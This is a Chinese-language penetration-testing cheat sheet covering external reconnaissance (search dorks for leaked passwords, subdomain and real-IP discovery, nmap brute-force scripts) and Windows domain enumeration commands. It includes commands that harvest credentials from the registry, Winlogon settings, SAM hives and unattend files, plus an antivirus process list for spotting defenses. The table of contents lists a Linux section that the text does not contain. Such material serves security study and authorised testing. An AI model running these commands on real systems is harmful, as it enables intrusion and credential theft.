当你的才华
还撑不起你的野心时
那你就应该静下心来学习
提前,祝贺大家七夕单身快乐... .../流下了伤心欲绝的眼泪
整理这些散落在不同地方的经典文章与公众号的信息收集方法与内网常用命令,花费了个人比较多的精力,愿分享出来,与君共享,本文章涉及与未涉及的知识点,会长期进行维护...
目录
0x01 前期信息收集踩点
0x02 GitHub 信息收集
0x03 端口、邮箱、备案收集
0x04 Whois 查询
0x05 在线网站备案查询
0x06 查找真实IP
假设:如果目标网站使用了CDN,该如何找到真实IP?
0x07 指纹识别
0x08 非常规操作
0x09 SSL/TLS证书查询
0x10 OSINT调查平台工具
0x11 自动化批量漏扫工具刺探+手工挖掘
内网信息探测命令
0x01 基本信息
0x02 常用端口
0x03 域内信息收集
0x04 杀毒软件进程名字
0x05 获取系统安装的软件的信息
0x06 查看启动程序信息
0x07 获取系统注册的服务信息
0x08 收集本地用户和组信息
0x09 敏感信息查找
0x10 获取本地开放的端口与连接信息
0x11 防护墙配置
0x12 查询远程连接服务
0x13 工作组信息收集
0x14 其它
0x15 域凭据收集
Linux 信息收集
0x01 版本信息
0x02 用户和组
0x03 环境信息
0x04 进程信息
0x05 服务信息
0x06 计划任务
0x07 网络、路由和通信
0x08 已安装的程序
0x09 文件
0x10 公私钥信息
0x11 日志
0x12 常见配置文件
Googe Hacke 搜索
如需更多搜索引擎语法前往
https://blog.csdn.net/God_XiangYu/article/details/103145225
https://blog.csdn.net/God_XiangYu/article/details/100062233
https://securitytrails.com/blog/google-hacking-techniques
以下是利用GHDB结合搜索引擎高级指令进行敏感信息获取的对应表:
a b c | 自动对词进行拆分匹配 拆分标准 空格 |
"a b c " | 把a b c 当成一个整体去查 |
" a*b" | *通配符 里面是一个或者多个 以a开头 b结尾 |
"ab" -c | 找到ab 不包含c |
a and b | 包含a和b |
"ab"(c|d) | ab中可能包含c或者d |
intitle: xx | 找标题 |
intext: xx | 找内容 |
inurl: *.baidu.com | 模糊搜索地址 |
inurl:phpmyadmin/index.php & (intext:username & password & "Welcome to") | |
inanchor:修改密码 | 锚点描述文本 |
filetype:pdf | 搜索 |
cache:baidu.com | 快照 历史信息 |
link:xxx.com | 搜索所有链接有xxx.com 链接 |
site:*.baidu.com | 搜索这个所有域名 |
related: xx.com |
搜索相关网站 |
- 数据库信息泄露
site:github.com root password site:github.com sa password site:github.com User ID='sa';Password
- svn信息泄露
site:github.com svn site:github.com svn password site:github.com svn username site:github.com svn username password
- 数据库备份文件
site:github.com inurl:sql
- 综合信息泄露
site:github.com password site:github.com ftp ftppassword site:github.com 密码 site:github.com 内部
- Github 信息收集
https://github.com/michenriksen/gitrob https://securitytrails.com/blog/github-dorks
名称 | 地址或命令 |
Tag1-Nmap端口扫描 | nmap -sS -T4 -Pn --open -n -p- -iL ***.txt -oX *** |
小蓝本 | https://www.xiaolanben.com/ |
ThreatScan | https://scan.top15.cn/web/ |
邮箱收集 | https://www.email-format.com/ |
奇怪域名收集 | https://archive.org/web/ |
Aquatone ---子域名截图 | https://github.com/michenriksen/aquatone |
Github 收集 | "*.com" login "*.com" ftp "*.com" password "*.com" token |
图标hash搜索 | 1. 平台 3. 脉脉 5. 抓公众号、小程序链接,能发现一堆奇奇怪怪的资产;还有抖音,支付宝商号等等 |
Fuzz | 资产存活,但却访问不了,是因为目录不正确,收集一个高命中率的资产字典进行fuzz |
Hosts碰撞 | https://github.com/r35tart/Hosts_scan 用于碰撞某些绑定了host的域名进行强制匹配进行访问,跟改了本地host文件一样 |
JS分析 | 网页的JS中往往存在着奇奇怪怪的URL,里面有些参数说不定也有,意想不到的接口泄露 推荐工具JSfinder https://github.com/Threezh1/JSFinder |
客服窗口 |
为什么此处会说客户窗口?说不定能弹个XSS,在打点的时候可以用此处知道客户的后台地址和Cookie |
通过whois来对域名信息进行查询,可以查到注册商、注册人、邮箱、DNS解析服务器、注册人联系电话等,因为有些网站信息查得到,有些网站信息查不到,所以推荐以下信息比较全的查询网站,直接输入目标站点即可查询到相关信息。
名称 | 地址 |
站长之家域名WHOIS信息查询地址 | http://whois.chinaz.com/ |
爱站网域名WHOIS信息查询地址 | https://whois.aizhan.com/ |
腾讯云域名WHOIS信息查询地址 | https://whois.cloud.tencent.com/ |
美橙互联域名WHOIS信息查询地址 | https://whois.cndns.com/ |
爱名网域名WHOIS信息查询地址 | https://www.22.cn/domain/ |
易名网域名WHOIS信息查询地址 | https://whois.ename.net/ |
中国万网域名WHOIS信息查询地址 | https://whois.aliyun.com/ |
西部数码域名WHOIS信息查询地址 | https://whois.west.cn/ |
新网域名WHOIS信息查询地址 | http://whois.xinnet.com/domain/whois/index.jsp |
纳网域名WHOIS信息查询地址 | http://whois.nawang.cn/ |
中资源域名WHOIS信息查询地址 | https://www.zzy.cn/domain/whois.html |
三五互联域名WHOIS信息查询地址 | https://cp.35.com/chinese/whois.php |
新网互联域名WHOIS信息查询地址 | http://www.dns.com.cn/show/domain/whois/index.do |
国外WHOIS信息查询地址 | https://who.is/ |
名称 | 地址 |
小蓝本 | https://www.xiaolanben.com/ |
天眼查 | https://www.tianyancha.com/ |
ICP备案查询网 | http://www.beianbeian.com/ |
爱站备案查询 | https://icp.aizhan.com |
域名助手备案信息查询 | http://cha.fute.com/index |
企查查 | https://www.qcc.com/ |
多地ping、nslookup、DNS 历史查询、查找子域名、反向连接、利用SSL证书寻找真实IP、国外解析域名、漏洞利用、目标敏感文件泄露、扫描全网、从 CDN 入手、利用HTTP标头寻找真实原始IP、利用网站返回的内容寻找真实原始IP、F5 LTM解码法
DNS解析与Whois 查询意义何在?
(1)DNS解析记录可以反查IP,比较早的解析记录有时可以查到真实IP,需要留意一下。
(2)注册人电话,注册人邮箱等社工信息可以钓鱼或者收集进字典来爆破目标办公系统。
为何需要手机子域名?
收集子域名可以扩大测试范围,同一域名下的二级域名都属于目标范围。
子域名中的常见资产类型一般包括办公系统,邮箱系统,论坛,商城等,其他管理系统,网站管理后台等较少出现在子域名中。
首先找到目标站点,在官网中可能会找到相关资产(多为办公系统,邮箱系统等),关注一下页面底部,也许有管理后台等收获。
查找目标域名信息的方法:
名称 | 用法或地址 |
FOFA | title="公司名称" |
钟馗之眼 | site=域名即可 |
百度 | intitle=公司名称 |
intitle=公司名称 | |
FOFA搜索子域名 | https://fofa.so/ 语法:domain=”baidu.com” |
Hackertarget查询子域名 | https://hackertarget.com/find-dns-host-records/ 注意:查询子域名可以得到一个目标大概的ip段,接下来可以通过ip来收集信息。 |
站长之家,直接搜索名称或者网站域名 | http://tool.chinaz.com/ |
钟馗之眼,直接搜索名称或网站名称 | https://www.zoomeye.org/ |
第三方子域名查询
名称 | 地址 |
子域名在线查询 | https://phpinfo.me/domain/ |
子域名在线查询 | https://www.t1h2ua.cn/tools/ |
IP138查询子域名 | https://site.ip138.com/baidu.com/domain.htm |
Layer子域名挖掘机4.2 | https://www.webshell.cc/6384.html |
Layer子域名挖掘机5.0 | https://pan.baidu.com/s/1wEP_Ysg4qsFbm_k1aoncpg 提取码:uk1j |
SubDomainBrute | https://github.com/lijiejie/subDomainsBrute |
Sublist3r | https://github.com/aboul3la/Sublist3r |
端口检测
名称 | 地址 |
在线端口检测 | http://coolaf.com/tool/port |
扫描主机端口 | nmap -T5 -A -v -p- |
扫描一个IP段,探测存活主机 | nmap -sP |
探测操作系统类型 | nmap -0 |
寻找登录授权页面 | nmap -p 80 --script http-auth-finder |
SSH爆破 | nmap -p22 --script ssh-brute |
dns 域传送漏洞 | nmap -p 53 --script dns-zone-transfer.nse -v |
Masscan | Masscan 127.0.0.0/24 -p443 # 单端口扫描 |
Masscan | Masscan 127.0.0.0/24 --top-ports 100 -rate 100000 # 快速扫描 |
Masscan | Masscan 127.0.0.0/24 --top-ports 100 --excludefile exclude.txt # 排除指定目标 |
Masscan | Masscan 127.0.0.0/24 -p20,21,22,23,80,161,443,873,2181,3389,6379,7001,8000,8009,8080,9000,9009,9090,9200,9300,10000,50070 > results.txt |
注意:很多时候,主站虽然是用了CDN,但子域名可能没有使用CDN,如果主站和子域名在一个ip段中,那么找到子域名的真实IP也是一种途径,而且说不定子域名IP的C段就存在主域名的真实IP。
1. 部分收集真实IP,请参考如下文章
https://blog.csdn.net/God_XiangYu/article/details/106359936
2. phpinfo、旁站和C段
如果目标网站存在phpinfo泄露等,可以在phpinfo中的SERVER_ADDR或_SERVER[“SERVER_ADDR”]找到真实IP。
旁站往往存在业务功能站点,建议先收集已有IP的旁站,再探测C段,确认C段目标后,再在C段的基础上再收集一次旁站。
旁站是和已知目标站点在同一服务器但不同端口的站点,通过以下方法搜索到旁站后,先访问一下确定是不是自己需要的站点信息。
PS:不是所有C段都是该目标服务器的,可能只是某个范围是或切割多个范围才属于该目标范围的IP段,建议先收集已有IP的旁站,再探测C段,当然有些C段,你别傻不拉几的用Goby或漏扫直接扫,有些有WAF,你线程一大就封你IP,扫或不扫,根据现场测试业务环境决定。
3. 网络空间搜索引擎
如FOFA搜索旁站和C段
Nmap,Msscan扫描等
例如:
nmap -p 80,443,8000,8080 -Pn 192.168.0.0/24
网络空间搜索引擎
如果想要在短时间内快速收集资产,那么利用网络空间搜索引擎是不错的选择,可以直观地看到旁站,端口,站点标题,IP等信息,点击列举出站点可以直接访问,以此来判断是否为自己需要的站点信息。FOFA的常用语法
1、同IP旁站:ip=”192.168.0.1”
2、C段:ip=”192.168.0.0/24”
3、子域名:domain=”baidu.com”
4、标题/关键字:title=”百度”
5、如果需要将结果缩小到某个城市的范围,那么可以拼接语句
title="百度"&& region="Beijing"
6、特征:body=”百度”或header=”baidu”
扫描敏感目录/文件
扫描敏感目录需要强大的字典,需要平时积累,拥有强大的字典能够更高效地找出网站的管理后台,敏感文件常见的如.git文件泄露,.svn文件泄露,phpinfo泄露等,这一步一半交给各类扫描器就可以了,将目标站点输入到域名中,选择对应字典类型,就可以开始扫描了,十分方便
1、御剑
https://www.fujieace.com/hacker/tools/yujian.html
2、7kbstorm
https://github.com/7kbstorm/7kbscan-WebPathBrute
3、bbscan
https://github.com/lijiejie/BBScan
4、dirmap
https://github.com/H4ckForJob/dirmap
5、dirsearch
https://github.com/maurosoria/dirsearch
6、Github搜索
收集网站信息,对网站进行指纹识别,通过识别指纹,确定目标的cms及版本
云悉 | http://www.yunsee.cn/info.html |
潮汐指纹 | http://finger.tidesec.net/ |
CMS指纹识别 | http://whatweb.bugscaner.com/look/ |
1. 如果找到了目标的一处资产,但是对目标其他资产的收集无处下手时,可以查看一下该站点的body里是否有目标的特征,然后利用网络空间搜索引擎(如fofa等)对该特征进行搜索,如:body=”阿里XX”或body=”aliyun”等。
该方式一般适用于特征明显,资产数量较多的目标,并且很多时候效果不错2. 通过上述方式的找到aliyun.com的特征后,再进行body的搜索,然后再搜索到aliyun.com的时候,此时fofa上显示的IP大概率为aliyun.com的真实IP。
3. 如果需要对政府网站作为目标,那么在批量获取网站首页的时候,可以用上如下地址来查询
全国政府网站基本信息数据库
SSL/TLS证书通常包含域名、子域名和邮件地址等信息,结合证书中的信息,可以更快速地定位到目标资产,获取到更多目标资产的相关信息。
名称 | 地址 |
亚洲诚信-SSL/TLS安全评估 | https://myssl.com/ |
AUTO-EARN |
https://github.com/Echocipher/AUTO-EARN |
名称 | 地址 |
iKy | https://kennbroorg.gitlab.io/ikyweb/ PS:电子邮件收集信息并以漂亮的可视界面显示结果的工具 |
Boardreader | https://boardreader.com/ PS:搜索全球各个论坛平台的内容。 |
blackhat线上会议 | https://www.blackhat.com/us-20/briefings/schedule/ |
CTFR | https://github.com/UnaPibaGeek/ctfr 滥用证书透明度日志,允许在几秒钟内获取子域。 |
DNS 聚合器 | https://dnsdumpster.com/ |
网上有很多【Github】工具,此处就不介绍了,例如Goby+xray、AWVS等等
分割线
- 获取主机名
hostname echo %COMPUTERNAME%
- 系统体系架构
echo %PROCESSOR_ARCHITECTURE%
- 获取所属域信息
systeminfo systeminfo /S 192.168.1.101 /U testlab\test /P "test" 查看远程机器的系统配置
- 查看补丁信息
systeminfo/wmic qfe get caption,description,hotfixid,installedon
- 获取环境变量
set
- 获取IP地址(查看网络配置)
ipconfig /all
- 查看安装软件的版本
wmic product >secbang.txt # 使用wmic命令,把结果输出到txtGet-UnattendedInstallFile powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"
- 获取当前用户名
whoami 或 echo %USERNAME% whoami /all # 查看当前用户权限
- 查看注册表中的密码
reg query HKCU /f password /t REG_SZ /s reg query HKLM /f password /t REG_SZ /s
- 查看路由器信息
route print
- 查看本地DNS缓存
ipconfig /displaydns
- 跟踪本机出口ip
tracert 8.8.8.8
- 查看ARP 缓存(查找有价值的内网arp通信记录)
arp -a
- 查看是否连接到其它主机
netstat -ano
- 查看hosts文件
C:\WINDOWS\System32\drivers\etc\hosts
- 查看接口配置
netsh dump
- 查看SNMP配置
reg query HKLM\SYSTEM\CurrentControlSet'Services\SNMP /s
- 查看代理
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
- 查看本机共享列表
net share,wmic share get name,path,status
端口号 | 端口说明 | 利用技巧 |
---|---|---|
21/22/69 | FTP/TFTP:文件传输协议 | 爆破、嗅探、文件传输 |
22 | SSH:远程连接 | 爆破、SSH隧道内网转发、文件传输 |
23 | Telnet:远程连接 | 爆破、嗅探 |
25 | SMTP:邮件服务 | 邮件伪造 |
53 | DNS:域名系统 | DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙 |
67/68 | DHCP | 劫持、欺骗 |
110 | pop3 | 爆破 |
139 | Samba | 爆破、未授权访问、远程代码执行 |
143 | IMAP | 爆破 |
161 | SNMP | 爆破 |
389 | LDAP | 注入攻击、未授权访问 |
512/513/514 | linux rexec服务 | 爆破、远程登录 |
873 | rsync服务 | 未授权访问 |
1352 | Lotus Domino邮件服务 | 爆破:弱口令、信息泄漏:源代码 |
1433 | MSSQL | 注入、SA弱口令爆破、提权 |
1521 | Oracle | 注入、TNS爆破 |
2049 | NFS | 配置不当 |
2181 | ZooKeeper服务 | 未授权访问 |
3306 | MySQL | 注入、提权、爆破 |
3389 | RDP | 爆破、Shift后门、0708 |
4848 | GlassFish控制台 | 爆破:控制台弱口令、认证绕过 |
5000 | Sybase/DB2数据库 | 爆破、注入 |
5432 | PostgreSQL | 缓冲区溢出、注入、爆破:弱口令 |
5632 | PcAnywhere服务 | 抓密码、代码执行 |
5900 | VNC | 爆破:弱口令、认证绕过 |
6379 | Redis | 未授权访问、爆破:弱口令 |
7001、7002 | WebLogic控制台 | Java反序列化、控制台弱口令+部署webshell |
80/443 | Web | 常见web攻击、对应服务器版本漏洞 |
8080/8089 | JBoss/Resin/Jetty/Jenkins | 反序列化、控制台弱口令 |
8069 | Zabbix | 远程命令执行 |
9090 | WebSphere控制台 | 爆破:控制台弱口令、Java反序列 |
9200/9300 | Elasticsearch服务 | 远程代码执行 |
11211 | Memcacache | 未授权访问 |
27017、27018 | MongoDB | 爆破、未授权访问 |
- 通过查询系统详细信息来判断是否存在域
systeminfo|findstr "Domain" systeminfo|findstr "域"
- 查看指定用户在当前域中的详细属性信息
net user Agan /domain
- 查看当前域中的所有用户名,根据用户名总数大概判断域的规模
net user /domain
- 查看时间服务器,一般域控会做时间服务器
net time /domain
- 查看域或工作组中的计算机列表(查看所有的域名称)
net view /domain
- 查看指定域中在线的计算机列表
net view /domain:domain_name
- 获取域分组
net group /domain
- 查看当前域中的域管账户
net group "domain admins" /domain
- 查看当前域中的所有的计算机名(登录过该域的计算机)
net group "domain computers" /domain
- 查看域控
net group "domain controllers" /domain
- 查看域控机器名
nltest /DCLIST:域名
- 查看域控主机名
nslookup -type=SRV \_ladp._tcp
- 查看域控制器IP
dsquery server
- 查看域控制器组
net group "Domain Controllers" /domain,netdom query pdc
- 查看域内信任关系
nltest /domain_trusts
- 查看当前域的域内账户密码设置策略
net accounts /domain
- 查看看当前的登录域
net config workstation
- 查看当前域中在线的机器,不太直观,批处理把机器名对应的ip也显示出来
net view ---- WIN10下使用Net view会出现如下报错 System error 1231 System error 6118 解决:https://social.technet.microsoft.com/Forums/en-US/6f102ed1-8e76-4cb7-8dec-05714466d441/net-view-system-error-1231?forum=win10itpronetworking ----
- ※【DC执行】导出域内DNS信息
dnscmd /zoneexport hack7.local dns.txt
- 查看域内邮件服务器
nslookup -q=mx agan1.local
- 查看域内DNS服务器
nslookup -q=ns agan1.local
- 查看域内的主域控,仅限win2008及之后的系统
netdom query pdc
- dsquery导出域信息
利用dsquery 工具搜集域内信息,域成员机器需要自己传上去 dsquery computer # 查看当前域内的所有机器,dsquery工具一般在域控上才有,不过你可以上传一个dsquery dsquery user # 查看当前域中的所有账户名 dsquery group # 查看当前域内的所有组名 dsquery subnet # 查看到当前域所在的网段,结合nbtscan使用 dsquery site # 查看域内所有的web站点 dsquery server # 查看当前域中的服务器(一般结果只有域控的主机名) dsquery user domainroot -name admin* -limit 240 # 查询前240个以admin开头的用户名
- csvde导出域信息
拥有一个当前有效的域用户账户及密码时,使用如下命令 csvde.exe –f c:\windows\temp\e.csv –n –s 192.168.1.100(DC的IP) –b 域用户名 域名 域用户密码 如果拥有使用域成员主机的system权限或者当前就在DC上 csvde.exe –f c:\windows\temp\e.csv –n –s 192.168.1.100(DC的IP)
- SPN扫描
setspn -T target.com -Q */* 可完整查出当前域内所有spn setspn -T domain -q */* # win自带命令完成扫描 或 setspn -Q */* Find-PSServiceAccounts.ps1 # 发现包含弱密码的服务 PS:不同于常规的tcp/udp端口扫描,由于spn本质就是正常的Kerberos请求, 所以扫描是非常隐蔽,日前针对此类扫描的检测暂时也比较少。 大部分win系统默认已自带spn探测工具即:setspn.exe,此操作无需管理权限,需域内机器执行。 详细介绍:域安全-SPN扫描 http://hackergu.com/kerberos-sec-spn-search/ 其它一些脚本:https://github.com/PyroTek3/PowerShell-AD-Recon/
- UDP扫描
sudo unicornscan -mU 192.168.2.100 # Linux下推荐使用,需要自己安装,也可用以端口扫秒 sudo unicornscan -mU 192.168.2.0/24
- ICMP扫描
# CMD轻量级命令,对C段进行ping扫描 for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.2.%I | findstr "TTL=" for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i "ttl" 导出成文本: @for /l %i in (1,1,255) do @ping -n 1 -w 40 192.168.0.%i & if errorlevel 1 (echo 192.168.0.%i>>c:\a.txt) else (echo 192.168.0.%i >>c:\b.txt) # powershell对目标内网进行icmp扫描 powershell.exe -exec bypass -Command "Import-Module C:\Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -Port 21,22,23,25,53,80,81,82,83,84,85,86,87,88,89,110,111,143,389,443,445,873,1025,1433,1521,2601,3306,3389,3690,5432,5900,7001,8000,8080,8081,8082,8083,8084,8085,8086,8087,8089,9090,10000"
- ARP扫描
arp可以轻易bypass掉各类应用层防火墙,除非是专业的arp防火墙就不行了 # Linux下推荐使用,kali自带,通过端口转发或边界代理 sudo netdiscover -r 192.168.2.0/16 -i eth0 # Windows下推荐使用,上传到目标主机 arp-scan.exe -t 192.168.2.0/24 arp-scan.exe下载地址:https://github.com/QbsuranAlang/arp-scan-windows 使用Empire的arpscan模块 usemodule situational_awareness/network/arpscan set Range 192.168.2.0-192.168.2.254 execute
- 扫描域内端口
如果能边界代理连接内网的话可以用msscan或nmap。 若目标PowerShell 3.0以上的版本,可以用Nishang的Invoke-PortScan模块 #主机发现、解析主机名 Invoke-PortScan -StartAddress 192.168.2.1 -EndAddress 192.168.2.255 -ResolveHost #端口扫描,默认扫描常见端口可打开脚本查看,也可以用 -Port指定端口 Invoke-PortScan -StartAddress 192.168.2.1 -EndAddress 192.168.2.254 -ResolveHost -ScanPort
- Nmap 扫描
Nmap -sP 192.168.1.0/24 # Nmap进行存活IP地址扫描Get-Webconfig nmap -sS -sV -O -p0-65535 192.168.80.145 # 扫描内网单个主机端口 有的网络比较差
- ldapsearch
详细介绍:渗透基础——活动目录信息的获取 https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E6%B4%BB%E5%8A%A8%E7%9B%AE%E5%BD%95%E4%BF%A1%E6%81%AF%E7%9A%84%E8%8E%B7%E5%8F%96/
- Bloodhound/Sharphound
BloodHound以用图与线的形式,将域内用户、计算机、组、Sessions、ACLs以及域内所有相关用户、组、计算机、登陆信息、访问控制策略之间的关系更直观的展现在Red Team面前进行更便捷的分析域内情况,更快速的在域内提升自己的权限。它也可以使Blue Team成员对己方网络系统进行更好的安全检测及保证域的安全性。 这里直接介绍需要在内网机器中执行的相关命令: 此工具的导出相对来说比较暴力,且目前此工具 exe 原版已经被识别并被各种杀软查杀,包括微软win10自带的杀软 Windows Defender 。
详细参考
- 定位域控【查询dns解析记录】
若当前主机的dns为域内dns,可通过查询dns解析记录定位域控。 C:\Users\xingzheng>nslookup -type=all _ldap._tcp.dc._msdcs.hack7.local DNS request timed out. timeout was 2 seconds. 服务器: UnKnown Address: 192.168.86.109 _ldap._tcp.dc._msdcs.hack7.local SRV service location: priority = 0 weight = 100 port = 389 svr hostname = dc.hack7.local dc.hack7.local internet address = 192.168.86.109
- 定位域控【SPN扫描】
在SPN扫描结果中可以通过如下内容,来进行域控的定位 CN=DC,OU=Domain Controllers,DC=hack7,DC=loca
- 定位域控【net group】
C:\Users\xingzheng>net group "domain controllers" /domain 这项请求将在域 hack7.local 的域控制器处理。 组名 Domain Controllers 注释 域中所有域控制器 成员 ------------------------------------------------------------------------------- DC$ 命令成功完成。
- 定位域管理员
获取域内一个支点后需要获取域管理员权限。 域管理员有其它域成员主机的本地系统管理员权限,具备完全控制权。 推荐使用Empire的user_hunter模块 usemodule situational_awareness/network/powerview/user_hunter execute #可以清楚的看到哪个用户登录了哪个主机
- 定位域控【端口识别】
端口:389 服务:LDAP、ILS 说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。 端口:53 服务:Domain Name Server(DNS) 说明:53端口为DNS(Domain Name Server,域名服务器)服务器所开放, 主要用于域名解析,DNS服务在NT系统中使用的最为广泛。 通过DNS服务器可以实现域名与IP地址之间的转换,只要记住域名就可以快速访问网站
- 利用脚本信息收集
GDA.bat下载地址
PowerView.ps1下载地址
360SD.exe 360杀毒
360TRAY.exe 360实时保护
ZHUDONGFANGYU.exe 360 主动防御
KSAFETRAY.exe 金山卫士
SAFEDOGUPDATECENTER.exe 服务器安全狗
MCAFEE MCSHIELD.exe MCAFEE
EGULEXE NoD32
AVP.exe 卡巴斯基
AVGUARD.exe 小红伞
BDAGENT.exe BITDEFENDER
"avcenter.exe": "Avira(小红伞)",
"avguard.exe": "Avira(小红伞)",
"avgnt.exe": "Avira(小红伞)",
"sched.exe": "Avira(小红伞)",
"ashDisp.exe": "Avast网络安全",
"rtvscan.exe": "诺顿杀毒",
"ccapp.exe": "Symantec Norton",
"NPFMntor.exe": "Norton杀毒软件相关进程",
"ccSetMgr.exe": "赛门铁克",
"ccRegVfy.exe": "Norton杀毒软件自身完整性检查程序",
"vptray.exe": "Norton病毒防火墙-盾牌图标程序",
"ksafe.exe": "金山卫士",
"QQPCRTP.exe": "QQ电脑管家",
"Miner.exe": "流量矿石",
"AYAgent.exe": "韩国胶囊",
"patray.exe": "安博士",
"V3Svc.exe": "安博士V3",
"avgwdsvc.exe": "AVG杀毒",
"QUHLPSVC.exe": "QUICK HEAL杀毒",
"mssecess.exe": "微软杀毒",
"KSWebShield.exe": "金山网盾",
"rfwmain.exe": "瑞星防火墙",
"kpfwtray.exe": "金山网镖",
"BaiduSdSvc.exe": "百度杀毒-服务进程",
"BaiduSdTray.exe": "百度杀毒-托盘进程",
"BaiduSd.exe": "百度杀毒-主程序",
"SafeDogGuardCenter.exe": "安全狗",
"safedogupdatecenter.exe": "安全狗",
"safedogguardcenter.exe": "安全狗",
"SafeDogSiteIIS.exe": "安全狗",
"SafeDogTray.exe": "安全狗",
"SafeDogServerUI.exe": "安全狗",
"D_Safe_Manage.exe": "D盾",
"d_manage.exe": "D盾",
"yunsuo_agent_service.exe": "云锁",
"yunsuo_agent_daemon.exe": "云锁",
"hipstray.exe": "火绒",
"wsctrl.exe": "火绒",
"usysdiag.exe": "火绒",
"SPHINX.EXE": "SPHINX防火墙",
"bddownloader.exe": "百度卫士",
"baiduansvx.exe": "百度卫士-主进程",
"AvastUI.exe": "Avast!5主程序"
- 查看安装了什么软件
dir /a "C:\Program Files" dir /a "C"\Program Files(x86)" reg query HEKY_LOCAL_MACHIN\SOFTWARE
- 有没有文件夹或文件权限配置错误,查看“Program Files”和“Program Files (x86)”下对“Everyone”和“Users”开放所有权限的文件夹
icals "C:\Program Files\*" 2>null | findstr "(F)" | findstr "Everyone" icals "C:\Program Files(x86\*)" 2>null |findstr "(F)" | findstr "Everyone" icals "C:\Program Files\*" 2>null | findstr "(F)" | findstr "BUILIN\Users" icals "C:\Program Files(x86\*)" 2>null | findstr "(F)" |findstr "BUILIN\Users"
- 查看“Program Files”和“Program Files (x86)”下对“Everyone”和“Users”开放修改权限的文件夹
icals "C:\Program Files\*" 2>null | findstr "(M)" | findstr "Everyone" icals "C:\Program Files(x86\*)" 2>null |findstr "(M)" | findstr "Everyone" icals "C:\Program Files\*" 2>null | findstr "(M)" | findstr "BUILIN\Users" icals "C:\Program Files(x86\*)" 2>null | findstr "(M)" |findstr "BUILIN\Users"
- 从Sysinternals上传accesschk来检查可写文件夹和文件
accesschk.exe -qwsu "Everyone" * accesschk.exe -qwsu "Authenticated Users" * accesschk.exe -qwsu "Users" *
- 当前进程信息
tasklist
- 获取系统补丁情况
wmic qfe list
- 使用wmic来识别安装在系统中的补丁情况
wmic qfe get Caption,Description,HotFixID,InstalledOn
- 查看系统体系结构
echo %PROCESSOR_ARCHITECTURE%
- 安装软件版本信息
wmic product get name,version wmic product get name /value
- PowerShell命令,收集软件版本信息条具体如下
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"
- 查询本机服务信息
wmic service list brief
查看补丁情况
wmic qfe get Caption,Description,HotFixID,InstalledOn systeminfo/wmic qfe get caption,description,hotfixid,installedon # 查看补丁信息
创建系统隐藏文件
ttrib +s +a +r +h filename / attrib +s +h filename
- 进程列表和进程用户,分析软件、邮件客户端、VPN和杀毒软件等进程
tasklist /v
- 命令也可以查看进程信息
wmic process list brief
- 执行如下命令查看启动程序信息
wmic startup get command,caption
- 获取系统注册的服务信息
sc query state=all
- 获取在线主机信息
net view
- 查看系统上正在运行的进程/服务有哪些,以及有没有暴露的内部服务
tasklist /svc taskkill /v net start sc query
注册表
reg
- Registry 某些情况下可能会包含凭证
reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
- Windows 自动登陆
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
- SNMP 相关参数
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
- 获取本地用户组
net localgroup
- 获取本地用户
net user
- 查当前机器中所有的组名,了解不同组的职能,如:IT,HR,admin,file
net localgroup
- 查指定组中的成员列表
net localgroup administrators
- 列举用户,查看是否有旧的用户配置文件没有清理
dir /b /ad "C:\Users\" dir /b /ad "C:\Documents and Settings\" #Windows XP and below
- 查看当前在线用户信息
query user || qwinsta
- 查客户端会话信息
net session
- 查询端口列表信息
netstat –ano
- 查看是否有其它人登录
qwinsta
- 查看注册表中跟用户自动登录有关的内容
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>null | findstr "DefaultUserName DefaultDomainName DefaultPassword"
- 查看Credential Manager中的内容
cmdky /list
- 确定是否可以访问SAM和SYSTEM文件
%SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system
- 查找有没有未清理的sysprep或无人值守的文件
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
- 如果服务器是IIS网络服务器,那么inetpub中有什么?是否存在隐藏的目录或者web.config文件
dir /a C:\inetpub\ dir /s Web.config C:\Windows\System32\inetsrv\config\applicationHost.config
- 查看日志
c:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log c:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log c:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log c:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
- 远程登录日志
c:\windows\system32\winevt\logs\*.remote*
- 主机远程登录日志
HKCU\Software\Microsoft\Terminal Server Client\Servers HKCU\Software\Microsoft\Terminal Server Client\Default
- 服务器登录日志 登录事件ID 4624,可判别出登录域控制器的机器
C:\Windows\System32\winevt\Logs\Security.evtx
日志与事件信息
wevtutil
- 获取windows远程桌面 连接记录
cmdkey /list # 查看mstsc的连接纪录
- 获取系统日志信息
两种方式:
1. 一种本地导出
copy C:\Windows\System32\winevt\Logs\System.evtx copy C:\Windows\System32\winevt\Logs\security.evtx copy C:\Windows\System32\winevt\Logs\application.evtx
2. 工具导出
.\psloglist -x system > system.log ..\psloglist -x security > security.log ..\psloglist -x application > application.log
- 检查是否安装了XAMPP,Apache或PHP,以及是否有XAMPP,Apache或PHP的配置文件
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
- 查看是否有Apache网络日志
dir /s acces.log error.log
- 查看是否有其它有意思的文件,它们可能在用户目录中(桌面,文档等)
dir /s *pass* == *vnc* == *.config* 2>nul
- 检查配置文件
cd /web、findstr /s /m "password" *.*
